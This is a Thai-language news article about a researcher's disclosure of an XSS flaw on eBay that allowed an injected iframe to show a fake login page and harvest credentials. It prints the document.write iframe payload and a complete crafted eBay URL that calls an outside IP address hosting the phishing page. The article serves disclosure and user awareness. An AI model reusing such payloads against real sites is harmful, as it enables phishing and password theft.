นักวิจัยด้านความปลอดภัยนามปากกา MLT ได้ออกมาเปิดเผยถึงช่องโหว่ Cross-site Scripting (XSS) บนเว็บไซต์ eBay ซึ่งช่วยให้แฮ็คเกอร์สามารถลอบส่งโค้ดเข้าไปปลอมแปลงหน้า Login เพื่อหลอกขโมยรหัสผ่านจากผู้ใช้บริการหลายร้อยล้านคนได้อย่างแยบยล
แฝงหน้า Phishing ผ่านช่องโหว่ XSS
ช่องโหว่ XSS ที่ค้นพบนี้อยู่บน URL Parameter ที่ช่วยให้แฮ็คเกอร์สามารถลอบส่งโค้ด iFrame เข้ามายังเว็บไซต์ของ eBay ได้ ส่งผลให้แฮ็คเกอร์สามารถเชื่อมโยง iFrame ดังกล่าวกับหน้า Page สำหรับทำ Phishing เพื่อหลอกให้ผู้ใช้บริการมากรอก Username และ Password เพื่อขโมยออกไป ซึ่งทั้งหมดนี้ยังคงแสดงผลอยู่บนหน้าเว็บไซต์ปกติของ eBay
document.write(‘<iframec=”http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html” width=”1500″ height=”1000″>’)
หน้า Page สำหรับทำ Phishing แทบจะมีหน้าตาเหมือนหน้า Login ปกติของ eBay ทุกประการ ต่างกันเพียงแค่ URL ในส่วนช่วงหลังเท่านั้น ซึ่งผู้ใช้บริการส่วนใหญ่จะไม่สามารถจับสังเกตได้ เรียกได้ว่าเป็นการทำ Phishing ที่สุดแสนจะแนบเนียน
http://ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29
เมื่อผู้ใช้บริการกรอก Username และ Password ลงไปบนหน้าเว็บ Phishing นี้จะไม่สามารถเข้าใช้ระบบของ eBay ได้และข้อมูลทั้งหมดจะถูกส่งไปยังแฮ็คเกอร์ทันที ดูวิดีโอสาธิตตัวอย่างการโจมตีด้านล่าง
แจ้ง eBay ไปเมื่อเดือนธันวาคม แต่ไร้ซึ่งแพทช์อัพเดท
MLT ได้ส่งรายละเอียดช่องโหว่ไปยัง eBay ตั้งแต่เมื่อวันที่ 11 ธันวาคม หลังจากที่ eBay ได้รับเรื่องและมีการสอบถามข้อมูลเพิ่มเติม เรื่องก็เงียบหายไป ไม่มีแม้กระทั่งแพทช์ออกมาอัพเดท MLT จึงตัดสินใจเปิดเผยช่องโหว่นี้สู่สาธารณะ ซึ่งก็เปิดไปตามคาด เพียงไม่กี่วันถัดมา eBay ก็ได้ออกแพทช์เพื่ออุดช่องโหว่เป็นที่เรียบร้อย ต้องขอบคุณ MLT ที่ช่วยให้ผู้ใช้บริการหลายคนรอดพ้นจากการถูกขโมยรหัสผ่าน อย่างไรก็ตาม ยังคงแนะนำให้ผู้ใช้ทุกคนเปลี่ยนรหัสผ่านใหม่ เพื่อความมั่นใจว่ารหัสผ่านล่าสุดจะไม่ได้ถูกขโมยไป